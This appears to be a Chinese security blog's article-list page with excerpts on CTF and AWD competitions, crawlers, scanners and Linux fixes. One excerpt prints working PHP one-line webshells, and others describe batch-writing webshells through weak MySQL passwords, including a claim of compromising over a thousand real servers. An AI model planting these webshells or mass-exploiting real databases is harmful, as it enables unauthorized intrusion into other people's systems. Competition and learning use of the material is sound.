记录
Blus.King
道阻且长,行则将至
展开
-
先知社区-文章爬虫-python脚本
说明· 先知社区文章爬虫,保存成pdf文件· 自己是在win10上跑的,没太考虑其他系统。windows应该可以直接跑,其他系统需提前安装wkhtmltopdf,然后在代码里修改路径。path_wk = r'.\wkhtmltopdf\bin\wkhtmltopdf.exe'· 采用的是逆序,从最新文章开始保存。需手动在代码里,8590位置处,填写最新一篇文章的页码。 for i in range(8590,0,-1): #逆序循环爬取,注意这里要添加最新文章的页码 https:原创 2020-12-07 10:54:26 · 3331 阅读 · 10 评论 -
根治dockerfile构建镜像时mysql服务报错问题--(Ubuntu内核快速升级)
1.Linux version 4.4.0-137-generic (buildd@lgw01-amd64-037) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.10) ) #163-Ubuntu SMP Mon Sep 24 13:14:43 UTC 2018在上述ubuntu上使用Dockerfile构建镜像时,拉...原创 2020-01-21 10:55:52 · 410 阅读 · 0 评论 -
安恒月赛WriteUp-2018.12
安恒月赛WriteUp2018-12月 WEB1-easy:web1反序列化 一打开就显示了源代码: <?php @error_reporting(1);include 'flag.php';class baby{ public $file; function __toString() { ...原创 2018-12-22 22:24:51 · 2908 阅读 · 0 评论 -
自制python脚本,6小时获取上千台mysql数据库服务器
原文投稿在合天智汇的微信公众号:https://mp.weixin.qq.com/s/OuwL3O9rszdbRPg_6uLPGQ但由于那里文章中的截图过于模糊,于是在这里再记录一下。 前言: 一开始,我只是想把一个AWD下的批量写马工具升级改造一下,记录一下期间的心得体会,本以为现在mysql弱口令连接的漏洞很少。但当最后工具完成后,一测试扫描外国网段,半天时间...原创 2018-12-24 15:31:17 · 1069 阅读 · 7 评论 -
一条命令完成snort安装
跟安装docker一样不需要像网上那么麻烦,直接apt就行。Ubuntu16.04安装snort:sudo apt install snort原创 2019-05-20 14:14:20 · 330 阅读 · 0 评论 -
自制Python后台目录扫描器
以前用御剑扫描,但经常会出现bug,不抓流量还不一定能发现,结果可信度不高。当然也可以偷懒使用burpsuite之类的intruder功能来充当扫描器。但为了更好的掌控扫描的情况,就自己写了个python扫描器。代码如下:#!/usr/bin/env python# encoding: utf-8import requestsimport threadingimpo...原创 2019-05-28 17:35:16 · 994 阅读 · 0 评论 -
2019强网杯 - 密码学-RSA-Coppersmith
Coppersmith 相关攻击学习资料:https://ctf-wiki.github.io/ctf-wiki/crypto/asymmetric/rsa/rsa_coppersmith_attack/https://code.felinae98.cn/ctf/crypto/rsa%E5%A4%A7%E7%A4%BC%E5%8C%85%EF%BC%88%E4%BA%8C%EF%BC%...原创 2019-05-28 19:09:55 · 17456 阅读 · 7 评论 -
华为交换机基本命令
命令不区分大小写,支持“Tab”键补全,支持命令简写。一、常用命令用户视图<Huawei> 进入系统视图<Huawei> system-view 或者 sys 或者 system[Huawei] 更改设备的名字[Huawei] sysname HW [HW] 进入接口视图[Huawei]interfa...原创 2018-11-10 21:10:55 · 38438 阅读 · 4 评论 -
抖音·某无关痛痒的信息泄露接口
以前的老稿子,发现是私密状态。 重新发布一下,做个记录。---------------------当初的正文-------------------------------------------------------------------------------------------------------------------版本:3.7.0(测试时最新)起...原创 2020-02-09 23:08:05 · 1526 阅读 · 1 评论 -
ubuntu解决"无法获得锁"与"无法打开锁文件"
sudo apt-get install XXXXXX 报错1:E: 无法获得锁 /var/lib/dpkg/lock - open (11: 资源暂时不可用)E: 无法锁定管理目录(/var/lib/dpkg/),是否有其他进程正占用它? 解决:查看占用apt-get的进程的pid,然后killps -A | grep aptkill可以一个命令完成:...原创 2018-12-14 16:01:34 · 4143 阅读 · 1 评论 -
python socket.connect注意事项,端口应为int型
import socketdef port_status(ip,port): server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: server.connect((ip,port)) print('port open') server.close(...原创 2018-11-21 17:31:45 · 9735 阅读 · 0 评论 -
AWD模式下的各类PHP木马
经典一句话木马最最常见的PHP木马,经典,但也满足不了我们的需求,很容易被大佬识破<?php @eval($_POST["cmd"]); ?><?php@assert($_POST['cmd']);?>混淆马:让木马内容难以识别<?php assert($_POST[-7]); ?> 变换成<?php ...原创 2019-04-19 17:09:29 · 5291 阅读 · 1 评论 -
AWD下-MySql漏洞批量利用脚本
这个脚本最开始的构思是在AWD比赛的情景下,因为所有服务器的环境都相同,只要查看本地的MySql用户名密码就知道了所有服务器的MySql用户名密码。若服务器开放了3306端口,那么利用这一个漏洞就能顺利获得所有服务器权限。有备无患,于是就写了这个Mysql批量连接写小马的脚本。以下是最初的脚本(python2),当然后来又更新换代加了骚思路,过一段时间会放出...... 需要安装mysq...原创 2018-12-09 21:20:02 · 1649 阅读 · 0 评论 -
KALI64位安装32位兼容库
参考:https://blog.csdn.net/qq_21210995/article/details/60333737为了使在64位kali中使用gdb调试32位程序,并且让gcc和g++能够使用-m32来编译32位的程序,要进行一下操作。个人使用kaili的原始更新源(使用其它的源似乎有问题)使用命令:leafpad /etc/apt/sources.list,并改为以下内容,#官方源deb...原创 2018-04-14 20:12:38 · 5384 阅读 · 0 评论